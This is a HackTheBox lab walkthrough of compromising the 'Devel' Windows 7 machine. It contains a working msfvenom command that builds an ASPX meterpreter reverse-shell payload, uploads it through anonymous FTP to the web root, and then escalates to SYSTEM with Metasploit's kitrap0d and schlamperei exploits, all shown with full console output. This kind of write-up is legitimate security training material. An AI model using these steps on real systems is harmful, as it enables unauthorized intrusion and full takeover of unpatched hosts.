HackTheBox - Devel Walkthrough
# Jul 13, 2019
Time for the 3rd box. Another windows machine, this time - unpatched Windows 7 with… weird anonymous read/write access to the document root :) Again not the most interesting initial foothold, but it’s a practice :)
1. Recon and Information gathering
Nmap
root@warmachine:/hackthebox/devel# nmap -sV -sC 10.10.10.5 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-12 17:08 EEST
Nmap scan report for 10.10.10.5
Host is up (0.036s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Not much - ftp with anonymous + http.
Services
FTP
I have anonymous read/write permissions on what looks like the document root of the web server. Sweet!
HTTP
Just the default page for IIS Web server. Can confirm the content matches what I see in the ftp service.
2. Initial foothold/low priv access.
It looks like my best bet is to try a msfvenom payload for a reverse shell. And since it’s a Windows machine I prefer to make it a meterpreter one :)
root@warmachine:/hackthebox/devel/10.10.10.5# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4949 -f aspx > flame_n.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2815 bytes
root@warmachine:/hackthebox/devel/10.10.10.5# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put flame_n.aspx
local: flame_n.aspx remote: flame_n.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2851 bytes sent in 0.00 secs (7.9501 MB/s)
I’m using the “newer” aspx (at least compared with asp :)) as an output format since the server is running IIS 7.5. After uploading the payload I visit http://10.10.10.5/flame_n.aspx and get a callback to my msfconsole listener
meterpreter > getuid
Server username: IIS APPPOOL\Web
Let’s check systeminfo:
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ??
System Boot Time: 16/7/2019, 12:57:08 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 28/7/2017
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 535 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.368 MB
Virtual Memory: In Use: 679 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
Uh-oh.. looks like unpatched Windows 7 box, 32 bit. Running PowerUp with Invoke-AllChecks didn’t yield anything interesting.
I’ll check for some exploit suggestions with a script and with a metasploit module.
3. Privilege Escalation
Windows-Exploit-Suggester
First I’ll check with this script - https://github.com/GDSSecurity/Windows-Exploit-Suggester . I need to provide a copy of the output of systeminfo from the Windows box and get the Microsoft patch db:
root@warmachine:/opt/Windows-Exploit-Suggester# ./windows-exploit-suggester.py -u
[*] initiating winsploit version 3.3...
[+] writing to file 2019-07-13-mssb.xls
[*] done
root@warmachine:/opt/Windows-Exploit-Suggester# ./windows-exploit-suggester.py -i sysinfo_devel -d 2019-07-13-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
The output isn’t 100% correct but checking out the different vulns I find this as an metasploit module:
msf5 exploit(multi/handler) > search MS10-015
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms10_015_kitrap0d 2010-01-19 great Yes Windows SYSTEM Escalation via KiTrap0D
msf5 exploit(multi/handler) > options exploit/windows/local/ms10_015_kitrap0d
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
Okay, so it should work for 32 bit Windows 7. Let’s try it:
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Launching notepad to host the exploit...
[+] Process 2276 launched.
[*] Reflectively injecting the exploit DLL into 2276...
[*] Injecting exploit into 2276 ...
[*] Exploit injected. Injecting payload into 2276...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
Erm.. no session? What? And then I saw what I’m listening on… 10.0.2.15:4444 - my VM NAT address, not my htb VPN address. Quick change and then pwn:
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.25
lhost => 10.10.14.25
msf5 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Launching notepad to host the exploit...
[+] Process 1952 launched.
[*] Reflectively injecting the exploit DLL into 1952...
[*] Injecting exploit into 1952 ...
[*] Exploit injected. Injecting payload into 1952...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.25:4444 -> 10.10.10.5:49160) at 2019-07-13 11:06:27 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Nice! Let’s check the metasploit module for exploit suggesting:
Metasploit local_exploit_suggester
msf5 exploit(windows/local/ms10_015_kitrap0d) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
So again there’s exploit/windows/local/ms10_015_kitrap0d. I already played with that, I want to check if there’s anything else that works on the target. Like MS13-053
msf5 exploit(windows/local/ms10_092_schelevator) > use exploit/windows/local/ms13_053_schlamperei
msf5 exploit(windows/local/ms13_053_schlamperei) > set session 1
session => 1
msf5 exploit(windows/local/ms13_053_schlamperei) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Launching notepad to host the exploit...
[+] Process 4080 launched.
[*] Reflectively injecting the exploit DLL into 4080...
[*] Injecting exploit into 4080...
[*] Found winlogon.exe with PID 444
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms13_053_schlamperei) > set lhost 10.10.14.25
lhost => 10.10.14.25
msf5 exploit(windows/local/ms13_053_schlamperei) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms13_053_schlamperei) > run
[*] Started reverse TCP handler on 10.10.14.25:5555
[*] Launching notepad to host the exploit...
[+] Process 976 launched.
[*] Reflectively injecting the exploit DLL into 976...
[*] Injecting exploit into 976...
[*] Found winlogon.exe with PID 444
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.25:5555 -> 10.10.10.5:49165) at 2019-07-13 11:15:08 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Again after fixing the listening address I get SYSTEM. Let’s get my flags and call it a day :)
c:\Users>type c:\users\babis\desktop\user.txt.txt
type c:\users\babis\desktop\user.txt.txt
<...>
c:\Users>type c:\users\administrator\desktop\root.txt.txt
type c:\users\administrator\desktop\root.txt.txt
<...>